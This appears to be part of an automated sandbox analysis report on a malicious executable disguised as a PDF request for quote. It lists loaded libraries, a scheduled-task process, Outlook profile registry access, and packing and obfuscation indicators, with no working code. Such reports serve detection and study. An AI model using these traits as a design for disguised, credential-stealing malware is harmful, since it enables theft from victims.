                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: slc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sppc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: NEW.RFQ00876.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: NEW.RFQ00876.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdb source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdbt source: NEW.RFQ00876.pdf.exe, 00000000.00000002.1302892229.0000000001623000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aegBDZrMeWOlT.exe, 00000018.00000000.1385687295.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp, aegBDZrMeWOlT.exe, 0000001B.00000000.1538536765.0000000000E2E000.00000002.00000001.01000000.00000010.sdmp
                Source: Binary string: wntdll.pdbUGP source: NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NEW.RFQ00876.pdf.exe, NEW.RFQ00876.pdf.exe, 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1466766317.0000000004A53000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000003.1464102753.00000000048A2000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 0000001A.00000002.3732385691.0000000004D9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: msinfo32.pdbGCTL source: aegBDZrMeWOlT.exe, 00000018.00000003.1406034191.00000000009FB000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.cs.Net Code: T4R1qSirKvjZ8jPJXJU System.Reflection.Assembly.Load(byte[])
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs.Net Code: T4R1qSirKvjZ8jPJXJU System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07559638 pushad ; iretd 0_2_07559651
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_079DA7F8 pushad ; iretd 0_2_079DAF39
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE0EE0 push eax; iretd 0_2_07CE11C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE17DF push ebx; iretd 0_2_07CE17E2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE1750 push ebx; iretd 0_2_07CE1752
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE1681 push ebx; iretd 0_2_07CE1682
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE16BB push ebx; iretd 0_2_07CE16C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE16B8 push ebx; iretd 0_2_07CE16BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE23EF pushad ; iretd 0_2_07CE23F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE2328 pushad ; iretd 0_2_07CE232A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE1299 push ecx; iretd 0_2_07CE129A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE22B3 pushad ; iretd 0_2_07CE22BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE11E3 push eax; iretd 0_2_07CE11EA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CEE183 push eax; retf 0_2_07CEE1A9
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE1150 push eax; iretd 0_2_07CE11C2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE8B2B pushfd ; iretd 0_2_07CE8B32
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE8B29 pushfd ; iretd 0_2_07CE8B2A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE8AD0 pushfd ; iretd 0_2_07CE8AD2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CE8A91 pushfd ; iretd 0_2_07CE8A92
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_07CEF8E0 push edi; iretd 0_2_07CEF8E6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDC48B pushad ; retf 300Ch0_2_0CCDC4CA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD34B9 push es; retf 000Ch0_2_0CCD34BA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDC473 pushad ; retf 000Ch0_2_0CCDC482
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDB5C3 push esi; retf 000Ch0_2_0CCDB5CA
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD35D1 push es; retf 000Ch0_2_0CCD35D2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDB5D3 push esi; retf 000Ch0_2_0CCDB5F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD4581 push cs; retf 000Ch0_2_0CCD4582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCD4508 push cs; retf 000Ch0_2_0CCD450A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDB6B1 push edi; retf 000Ch0_2_0CCDB6B2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDB631 push esi; retf 000Ch0_2_0CCDB632
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 0_2_0CCDB741 push edi; retf 000Ch0_2_0CCDB742
                Source: NEW.RFQ00876.pdf.exeStatic PE information: section name: .text entropy: 7.711273899286818
                Source: RAangyFeHdZLco.exe.0.drStatic PE information: section name: .text entropy: 7.711273899286818
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, bmfDLjpuXXga1Np0I5.csHigh entropy of concatenated method names: 'x2iXqUZG1G', 'LrHXAUdtYv', 'Ubv4uIi80r', 'Opw4vNwv6w', 'dECXiyMeUr', 'Hh3XOECnbc', 'lfKX1GPXia', 'y88XUQ6Vou', 'gpZXdRqY15', 'LU8X3Bu54q'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, sqSHy0TDxnUit1Vs6T.csHigh entropy of concatenated method names: 'o34nDWFeG6', 'mnKnIshPkZ', 'W9dnHjvQM4', 'slUnPmG4an', 'ebLnNnLih4', 'g0rnS0Imkx', 'Q6UnjV0lik', 'AkEnW00net', 'ER0nK4PN2c', 'CSMnaHPffh'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, eg2N9YjocGCOskKUe5.csHigh entropy of concatenated method names: 'TNXFxt632v', 'lroFQBRvEA', 'N16FsKmiBr', 'jQosAMk86v', 'RkOszCnoW7', 'w1HFupmEed', 'XoKFvckIiO', 'iuZFbb9pgc', 'c06FJaeUBQ', 'WPaF0Cvwg2'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, cgFh7tKE3LhbGRybWr.csHigh entropy of concatenated method names: 'mrjFop23OO', 'WDHFG4ivDd', 'ILIFh0a1ZN', 'PqFFciJpMk', 'PfcFepcBEg', 'h1sFZfWYIu', 'OEDFtdFjYt', 'lQnF7XgUxi', 'JxRFLcktFL', 'WhgF2eqYHJ'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Hr7caELxU2fyHysv8H.csHigh entropy of concatenated method names: 'pOWQcfe4LZ', 'YbvQZjebnD', 'r03Q7gQ0Uq', 'vhBQLfTlxU', 'hBtQ89lTZj', 'IKpQfxSZmr', 'dQ1QX9CNAE', 'mu9Q46bOrX', 'sf4QnwQNxM', 'otxQVkotb9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, OwWfsDyt1nsMMbKb4J.csHigh entropy of concatenated method names: 'd8DXMv5lMO', 'SQwXmyoUvk', 'ToString', 'dSPXxyA76s', 'vJSXrOaYUe', 'iBYXQx6gJc', 'qBKXC51dJS', 'V11XshldkJ', 'z1lXFQrxif', 'BpnX9djIuw'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, TbPBtyAXJCZogp07Aj.csHigh entropy of concatenated method names: 'ecqVQodPma', 'Aq0VCBKPC8', 'm4yVslvTeX', 'VuRVFPVgTW', 'xeRVnlx8mm', 'htRV9wGgmU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, QZgRRnzdnwFIMTT8ri.csHigh entropy of concatenated method names: 'MWtVZTacaV', 'roEV7ahFS3', 'vOgVL6dAc4', 'sd3VDFLsCe', 'rbjVIknd2w', 'g6PVPlOALU', 'gGkVN4GDNh', 'iG9Vk0neWi', 'bcQVoHWroT', 'tVqVGlZurR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, lZQDKxbd8a3m5yw9bL.csHigh entropy of concatenated method names: 'SENh4W9QR', 'fYxcg8RQg', 'rNIZTrZBw', 'NAjtTEBlZ', 'swgLGckJo', 'N4P2p242O', 'e7HhJGZ15M0k2YXFNl', 'lCPgJRTlIAQSU3eIFT', 'J824ykg3l', 'XpaVhE1F7'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, Ailu8G9t2evw62NJXl.csHigh entropy of concatenated method names: 'hA4JRhcqmu', 'P8RJxHTJRH', 'qCbJrw4ZrD', 'OeyJQvaDvK', 'NriJCaf6xy', 'oWNJsibvFu', 'KcbJFS36Yo', 'aw1J9dBjmr', 'gv2JYMnyVn', 'BXCJMQD0f1'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ALXjfkrylHWxb186ed.csHigh entropy of concatenated method names: 'Dispose', 'yXNvTN19Fm', 'hctbIse7g9', 'x17eQI355w', 'jpXvAYP6iE', 'wvvvzR4exR', 'ProcessDialogKey', 'fpnbuqSHy0', 'FxnbvUit1V', 'i6TbbybPBt'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, FS0OkP0e6k09q0CE9U.csHigh entropy of concatenated method names: 'l4HvF87Xg7', 'cWFv9JPkXQ', 'vxUvM2fyHy', 'iv8vmHaEA2', 'Rtlv8NBi5K', 'TQCvfPn968', 'YJsfU548fWqkgMQl9R', 'D6eWfJv6rJRpHkqcjL', 'IuQvvc695b', 'APXvJyMcEl'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, FhKOe8wV3GXNN19Fms.csHigh entropy of concatenated method names: 'RTwn8j2Wf2', 'lmFnXl6K6x', 'lnHnnXjLGp', 'NOfn6XgG1p', 'zYPnlMYpNE', 'VpenkdReHr', 'Dispose', 'XjU4x0K4S1', 'anE4rk4WaT', 'B2m4QJk4PH'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, NEA2ti2eZaBjydtlNB.csHigh entropy of concatenated method names: 'Y1cCe5VBg3', 'uUjCtwDnGV', 'fd9QHmnfep', 'XiqQPFcw5p', 'tNPQNgoJ1Z', 'v8mQSuNMU7', 'PrEQjwgGmR', 'MWDQWrs9kB', 'zipQKWtWBx', 's91Qa2yx7R'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, RMB1Wp3sDbL6snkLuD.csHigh entropy of concatenated method names: 'ToString', 'm0yfigQR4b', 'b3LfImuoG4', 'TIGfHMe8x1', 'Nn0fPtfFxV', 'JwQfNmwIMU', 'lMYfSGRKfA', 'LIofjrT2Ue', 'YvsfWFlMVh', 'pqOfKZIABX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, KXhWqrIFpC3aTyFrCv.csHigh entropy of concatenated method names: 'TwNKhvufhLLHAAyKwce', 'pDoQXLuqLvAuUDTTjS3', 'txPs4faIKe', 'c9JsnDP08m', 'GPYsVOE5Qc', 'YVCatcuxWt9BmWEfrbU', 'QHdgkCuhS8nTcYwP1JR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, H87Xg77JWFJPkXQfOh.csHigh entropy of concatenated method names: 'h9GrUbJS9U', 'KEZrd0hjgK', 'yc3r3kxX6D', 's09ryAq8eS', 'o9ur54gtjJ', 'HHDrp67Aes', 'EWUrwceUJf', 'HJdrqiWX1p', 'K4nrTaEEdg', 'kNSrALAfjB'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, fYM5l4vvPkQmv6DEe7j.csHigh entropy of concatenated method names: 'wKEVAdqKQl', 'SNPVznf5ST', 'bIL6u0JCqZ', 'p2j6vkbRWb', 'A3w6bBw9Xe', 'FJF6JrUDbY', 'UFd60tONPV', 'gaM6RuLVJQ', 'uhb6xekieF', 'xLc6rPm3Gu'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, dnWL9Dv0TNdbK1I4b3U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCcBnXIflm', 'EdZBV1jKJo', 'S3CB6SAcVF', 'txFBBFiQv4', 'DxOBlXDCQZ', 'OR4BEBOcVn', 'TjvBk8II90'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ftiOZOvudvtoVZOhMnR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EatVi6SCs2', 'qdfVOpY8nO', 'DLEV1mdc1B', 'ellVU8NnSm', 'PXDVdKGMvS', 'bJ7V3uwq9x', 'W5kVyS2pe4'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, O5KyQCDPn9681CloIh.csHigh entropy of concatenated method names: 'E3ZsRGgE4w', 'nxJsraBc9w', 'EoMsC3tIgn', 'yvksF6mVxW', 'TrVs9kiNNt', 'rF1C5W0AoS', 'Ka3CpdD427', 'k7uCwxpoOV', 'IUbCqTROHb', 'M7kCT4Yba9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, cAQQjuUkVRdVJ9Gdhm.csHigh entropy of concatenated method names: 'G908aZYuIq', 'LMm8OvhH1w', 'wW38UxqFoN', 'k748dnZbc2', 'GCC8IA8mfP', 'TtA8H38IgQ', 'RIb8Pksi9V', 'hUH8NaUmbC', 'U6c8SBybOA', 'BE08jsIfSX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.7560000.7.raw.unpack, ovs4HF1taliex9VHSE.csHigh entropy of concatenated method names: 'dCtg7C40Dq', 'xKogLPFdDA', 'A18gDguFcN', 'J1RgIOUroY', 'el4gPyepHM', 'WP4gNDymVD', 'nuOgj1Try0', 'Ip0gWQL3gO', 'dulgahnuYa', 'TZogiH8ScD'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, bmfDLjpuXXga1Np0I5.csHigh entropy of concatenated method names: 'x2iXqUZG1G', 'LrHXAUdtYv', 'Ubv4uIi80r', 'Opw4vNwv6w', 'dECXiyMeUr', 'Hh3XOECnbc', 'lfKX1GPXia', 'y88XUQ6Vou', 'gpZXdRqY15', 'LU8X3Bu54q'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, sqSHy0TDxnUit1Vs6T.csHigh entropy of concatenated method names: 'o34nDWFeG6', 'mnKnIshPkZ', 'W9dnHjvQM4', 'slUnPmG4an', 'ebLnNnLih4', 'g0rnS0Imkx', 'Q6UnjV0lik', 'AkEnW00net', 'ER0nK4PN2c', 'CSMnaHPffh'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, eg2N9YjocGCOskKUe5.csHigh entropy of concatenated method names: 'TNXFxt632v', 'lroFQBRvEA', 'N16FsKmiBr', 'jQosAMk86v', 'RkOszCnoW7', 'w1HFupmEed', 'XoKFvckIiO', 'iuZFbb9pgc', 'c06FJaeUBQ', 'WPaF0Cvwg2'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, cgFh7tKE3LhbGRybWr.csHigh entropy of concatenated method names: 'mrjFop23OO', 'WDHFG4ivDd', 'ILIFh0a1ZN', 'PqFFciJpMk', 'PfcFepcBEg', 'h1sFZfWYIu', 'OEDFtdFjYt', 'lQnF7XgUxi', 'JxRFLcktFL', 'WhgF2eqYHJ'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Hr7caELxU2fyHysv8H.csHigh entropy of concatenated method names: 'pOWQcfe4LZ', 'YbvQZjebnD', 'r03Q7gQ0Uq', 'vhBQLfTlxU', 'hBtQ89lTZj', 'IKpQfxSZmr', 'dQ1QX9CNAE', 'mu9Q46bOrX', 'sf4QnwQNxM', 'otxQVkotb9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, OwWfsDyt1nsMMbKb4J.csHigh entropy of concatenated method names: 'd8DXMv5lMO', 'SQwXmyoUvk', 'ToString', 'dSPXxyA76s', 'vJSXrOaYUe', 'iBYXQx6gJc', 'qBKXC51dJS', 'V11XshldkJ', 'z1lXFQrxif', 'BpnX9djIuw'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, TbPBtyAXJCZogp07Aj.csHigh entropy of concatenated method names: 'ecqVQodPma', 'Aq0VCBKPC8', 'm4yVslvTeX', 'VuRVFPVgTW', 'xeRVnlx8mm', 'htRV9wGgmU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, QZgRRnzdnwFIMTT8ri.csHigh entropy of concatenated method names: 'MWtVZTacaV', 'roEV7ahFS3', 'vOgVL6dAc4', 'sd3VDFLsCe', 'rbjVIknd2w', 'g6PVPlOALU', 'gGkVN4GDNh', 'iG9Vk0neWi', 'bcQVoHWroT', 'tVqVGlZurR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, lZQDKxbd8a3m5yw9bL.csHigh entropy of concatenated method names: 'SENh4W9QR', 'fYxcg8RQg', 'rNIZTrZBw', 'NAjtTEBlZ', 'swgLGckJo', 'N4P2p242O', 'e7HhJGZ15M0k2YXFNl', 'lCPgJRTlIAQSU3eIFT', 'J824ykg3l', 'XpaVhE1F7'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.csHigh entropy of concatenated method names: 'hA4JRhcqmu', 'P8RJxHTJRH', 'qCbJrw4ZrD', 'OeyJQvaDvK', 'NriJCaf6xy', 'oWNJsibvFu', 'KcbJFS36Yo', 'aw1J9dBjmr', 'gv2JYMnyVn', 'BXCJMQD0f1'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ALXjfkrylHWxb186ed.csHigh entropy of concatenated method names: 'Dispose', 'yXNvTN19Fm', 'hctbIse7g9', 'x17eQI355w', 'jpXvAYP6iE', 'wvvvzR4exR', 'ProcessDialogKey', 'fpnbuqSHy0', 'FxnbvUit1V', 'i6TbbybPBt'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, FS0OkP0e6k09q0CE9U.csHigh entropy of concatenated method names: 'l4HvF87Xg7', 'cWFv9JPkXQ', 'vxUvM2fyHy', 'iv8vmHaEA2', 'Rtlv8NBi5K', 'TQCvfPn968', 'YJsfU548fWqkgMQl9R', 'D6eWfJv6rJRpHkqcjL', 'IuQvvc695b', 'APXvJyMcEl'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, FhKOe8wV3GXNN19Fms.csHigh entropy of concatenated method names: 'RTwn8j2Wf2', 'lmFnXl6K6x', 'lnHnnXjLGp', 'NOfn6XgG1p', 'zYPnlMYpNE', 'VpenkdReHr', 'Dispose', 'XjU4x0K4S1', 'anE4rk4WaT', 'B2m4QJk4PH'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, NEA2ti2eZaBjydtlNB.csHigh entropy of concatenated method names: 'Y1cCe5VBg3', 'uUjCtwDnGV', 'fd9QHmnfep', 'XiqQPFcw5p', 'tNPQNgoJ1Z', 'v8mQSuNMU7', 'PrEQjwgGmR', 'MWDQWrs9kB', 'zipQKWtWBx', 's91Qa2yx7R'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, RMB1Wp3sDbL6snkLuD.csHigh entropy of concatenated method names: 'ToString', 'm0yfigQR4b', 'b3LfImuoG4', 'TIGfHMe8x1', 'Nn0fPtfFxV', 'JwQfNmwIMU', 'lMYfSGRKfA', 'LIofjrT2Ue', 'YvsfWFlMVh', 'pqOfKZIABX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, KXhWqrIFpC3aTyFrCv.csHigh entropy of concatenated method names: 'TwNKhvufhLLHAAyKwce', 'pDoQXLuqLvAuUDTTjS3', 'txPs4faIKe', 'c9JsnDP08m', 'GPYsVOE5Qc', 'YVCatcuxWt9BmWEfrbU', 'QHdgkCuhS8nTcYwP1JR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, H87Xg77JWFJPkXQfOh.csHigh entropy of concatenated method names: 'h9GrUbJS9U', 'KEZrd0hjgK', 'yc3r3kxX6D', 's09ryAq8eS', 'o9ur54gtjJ', 'HHDrp67Aes', 'EWUrwceUJf', 'HJdrqiWX1p', 'K4nrTaEEdg', 'kNSrALAfjB'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, fYM5l4vvPkQmv6DEe7j.csHigh entropy of concatenated method names: 'wKEVAdqKQl', 'SNPVznf5ST', 'bIL6u0JCqZ', 'p2j6vkbRWb', 'A3w6bBw9Xe', 'FJF6JrUDbY', 'UFd60tONPV', 'gaM6RuLVJQ', 'uhb6xekieF', 'xLc6rPm3Gu'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, dnWL9Dv0TNdbK1I4b3U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCcBnXIflm', 'EdZBV1jKJo', 'S3CB6SAcVF', 'txFBBFiQv4', 'DxOBlXDCQZ', 'OR4BEBOcVn', 'TjvBk8II90'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ftiOZOvudvtoVZOhMnR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EatVi6SCs2', 'qdfVOpY8nO', 'DLEV1mdc1B', 'ellVU8NnSm', 'PXDVdKGMvS', 'bJ7V3uwq9x', 'W5kVyS2pe4'
